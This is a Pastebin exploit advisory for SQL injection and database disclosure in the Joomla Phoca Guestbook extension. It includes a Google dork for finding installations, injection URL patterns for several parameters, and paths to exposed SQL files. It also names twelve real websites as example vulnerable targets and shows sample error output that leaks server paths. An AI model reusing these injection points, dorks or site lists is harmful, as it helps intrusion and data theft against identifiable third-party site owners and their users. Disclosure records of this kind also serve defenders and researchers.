KingSkrupellos

Joomla PhocaGuestBook 3.0.8 SQL Inj DB Disc

Feb 11th, 2019
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.86 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla PhocaGuestBook 3.0.8 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 12/02/2019
  7. # Vendor Homepage : phoca.cz/phocaguestbook
  8. # Software Download Link : phoca.cz/download/category/5-phoca-guestbook-component
  9. github.com/PhocaCz/PhocaGuestbook/
  10. # Software Information Link : extensions.joomla.org/extension/phoca-guestbook/
  11. # Software Affected Versions : 1.4.5 - 1.5.3 - 2.0.2 - 2.0.7 - 3.0.2 - 3.0.5 - 3.0.6 - 3.0.8
  12. # Software Technical Requirements : Joomla! 1.5. Joomla! 2.5, Joomla! 3.x (stable or any later version)
  13. PHP 4, 5 (or any later version) with GD library (graphics library for CAPTCHA creation)
  14. # Tested On : Windows and Linux
  15. # Category : WebApps
  16. # Exploit Risk : Medium
  17. # Google Dorks : inurl:''/index.php?option=com_phocaguestbook''
  18. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  19. Special Elements used in an SQL Command ('SQL Injection') ]
  20. CWE-200 [ Information Exposure ]
  21. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  22. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  23. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  24.  
  25. ####################################################################
  26.  
  27. # Description about Software :
  28. ***************************
  29. Phoca Guestbook is Joomla! CMS extension. Component which displays guestbook
  30.  
  31. and its entries on website. Phoca Guestbook is a Joomla! component.
  32.  
  33. It is a guestbook with Anti-Spam protection which can be used as guestbook
  34.  
  35. or contact form. Contact form is protected by Anti-Spam methods and emails
  36.  
  37. with contact content can be sent to selected user.
  38.  
  39. ####################################################################
  40.  
  41. # Impact :
  42. ***********
  43. * Joomla PhocaGuestBook 3.0.8 and other versions -
  44.  
  45. component for Joomla is prone to an SQL-injection vulnerability because it
  46.  
  47. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  48.  
  49. Exploiting this issue could allow an attacker to compromise the application,
  50.  
  51. access or modify data, or exploit latent vulnerabilities in the underlying database.
  52.  
  53. A remote attacker can send a specially crafted request to the vulnerable application
  54.  
  55. and execute arbitrary SQL commands in application`s database.
  56.  
  57. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  58.  
  59. An attacker can exploit this issue using a browser.
  60.  
  61. * This Software prone to an information exposure/database disclosure vulnerability.
  62.  
  63. Successful exploits of this issue may allow an attacker to obtain sensitive
  64.  
  65. information by downloading the full contents of the application's database.
  66.  
  67. * Any remote user may download the database files and gain access
  68.  
  69. to sensitive information including unencrypted authentication credentials.
  70.  
  71. ####################################################################
  72.  
  73. # SQL Injection Exploit :
  74. **********************
  75. /index.php?option=com_phocaguestbook&view=[SQL Injection]
  76.  
  77. /index.php?option=com_phocaguestbook&id=[SQL Injection]
  78.  
  79. /index.php?option=com_phocaguestbook&view=phocaguestbook&id=[SQL Injection]
  80.  
  81. /index.php?option=com_phocaguestbook&view=phocaguestbook&id=[ID-NUMBER]&Itemid=[SQL Injection]
  82.  
  83. /index.php?option=com_phocaguestbook&view=guestbooki&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&phocasid=[SQL Injection]
  84.  
  85. /index.php?option=com_phocaguestbook&view=phocaguestbook&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
  86.  
  87. # Database Disclosure Exploit :
  88. ***************************
  89. /administrator/components/com_phocaguestbook/install.sql
  90.  
  91. /administrator/components/com_phocaguestbook/uninstall.sql
  92.  
  93. /administrator/components/com_phocaguestbookinstall/sql/mysql/install.utf8.sql
  94.  
  95. /administrator/components/com_phocaguestbookinstall/sql/mysql/uninstall.utf8.sql
  96.  
  97. ####################################################################
  98.  
  99. # Example Vulnerable Sites :
  100. *************************
  101. [+] rugbywinterthur.ch/rcwinti/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=13
  102.  
  103. [+] aziendaagricolagiuliana.it/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=104
  104.  
  105. [+] parcimonie.ch/pages/index.php?option=com_phocaguestbook&view=1%27
  106.  
  107. [+] tobytompkins.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=55
  108.  
  109. [+] weltumsegeln.ch/neu/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=55
  110.  
  111. [+] illasapo.nl/index.php?option=com_phocaguestbook&id=1
  112.  
  113. [+] ubezpieczenia-krosno.pl/index.php?option=com_phocaguestbook&id=1
  114.  
  115. [+] location-motopiste.com/index.php?option=com_phocaguestbook&view=guestbooki&id=1&Itemid=482&phocasid=1%27
  116.  
  117. [+] zd-sevnica.si/index.php?option=com_phocaguestbook&view=phocaguestbook&id=2
  118.  
  119. [+] falkenforum.de/falkencamp2009_cms/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=64
  120.  
  121. [+] loucky.info/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&
  122.  
  123. [+] carine-justin.simhom.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=223&limitstart=20
  124.  
  125. ####################################################################
  126.  
  127. # Example SQL Database Error :
  128. ****************************
  129. Strict Standards: Non-static method PhocaguestbookHelperFront::getDateFormat()
  130. should not be called statically, assuming $this from incompatible context in
  131. /var/www/vh196207/data/www/sch-33.ru/components/com_phocaguestbook
  132. /views/guestbook/view.html.php on line 64
  133.  
  134. Warning: mysql_num_rows() expects parameter 1 to be resource, boolean
  135. given in /home/zdsevnica/public_html/libraries/joomla/database
  136. /database/mysql.php on line 345
  137.  
  138. ####################################################################
  139.  
  140. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  141.  
  142. ####################################################################
Add Comment
Please, Sign In to add comment